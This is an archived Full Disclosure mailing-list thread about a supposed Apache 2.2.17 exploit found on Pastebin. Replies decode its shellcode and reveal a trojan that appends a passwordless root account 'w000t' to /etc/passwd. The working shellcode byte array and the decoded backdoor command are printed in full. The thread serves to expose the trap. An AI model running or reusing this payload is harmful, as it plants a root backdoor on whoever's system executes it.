Full Disclosure mailing list archives
Re: Apache 2.2.17 exploit?
From: xD 0x41 <secn3t () gmail com>
Date: Wed, 5 Oct 2011 14:50:47 +1100
(using an old account I must have set up a while ago named w000t). err..but, you ran it didnt you... so why would u need any old account :P hehe... just... something wich i find strange. I dont see any support would be good here :) lol.... i betting he does ONLy patch to stop the thing being re-rooted, as it has become public since posted onlist ;) hehe.... you shuld really not let him do much, if thats even true, wich i really am doubting... specially since u named this old account...when, also saying u tried to run it..wich would, exec shellcode...so i guess.. once cleared up, and if true, i know this is done by MANY smarter hax, and, your IP if it was ran, prolly also gets emailed somewhere, somehow... or, some alert made, or maybe, not.. but, if he was so fast to login then i wonder... but, then, he is only stopping it, frok other hackers, not from, other nice guys :) xd On 5 October 2011 14:06, VeNoMouS <venom () gen-x co nz> wrote:
** I dunno.... china offers usa that kind of support all the time ..... or so i heard.... On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote: Wow, I'm extremely impressed with the support that the developer of this exploit offers. I had been trying to get the exploit to work for about an hour or so (couldn't get root on the target) and noticed that the developer of this exploit logged into my machine (using an old account I must have set up a while ago named w000t). I couldn't believe it when I saw that he was logging in to fix the problem, I've NEVER gotten that kind of support even out of paid software. He's been logged in for a couple of hours now, and I've noticed that he's downloaded/uploaded quite a bit (probably downloading the log files and then uploading patches) so I'm just gonna wait it out. I definitely have a good feeling about this though. On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 <secn3t () gmail com> wrote:yer it is clarly leet stuff dude... i ran it and got liek 2000000000000000k2.2.* apache user bot in a night! :P hgehe (jkin) funny tho. xd On 5 October 2011 13:09, VeNoMouS <venom () gen-x co nz> wrote:char evil[] = "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46 \x47\x89" "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e \x51\x89" "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd \x80\xe8" "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d \x63\x23" "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30 \x30\x74" "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64 \x65\x3a" "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61 \x73\x68" "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73 \x77\x64" "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43 \x44\x44" "\x44\x44" ..... execl("/bin/sh", "sh", "-c", evil, 0); ..... /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd AHUH..... On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren 1. char evil[] = 2. "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88 \x46\x47\x89" 3. "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89 \x5e\x51\x89" 4. "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55 \xcd\x80\xe8" 5. "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23 \x2d\x63\x23" 6. "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30 \x30\x30\x74" 7. "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30 \x64\x65\x3a" 8. "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62 \x61\x73\x68" 9. "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73 \x73\x77\x64" 10. "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43 \x43\x43\x44\x44" 11. "\x44\x44"; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Apache 2.2.17 exploit?, (continued)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? Nathaniel Hirsch (Oct 03)
- Re: Apache 2.2.17 exploit? Andrew Farmer (Oct 03)
- Re: Apache 2.2.17 exploit? Guillaume Friloux (Oct 03)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? VeNoMouS (Oct 04)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
- Re: Apache 2.2.17 exploit? adam (Oct 04)
- Re: Apache 2.2.17 exploit? VeNoMouS (Oct 04)
- Re: Apache 2.2.17 exploit? adam (Oct 04)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
- Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)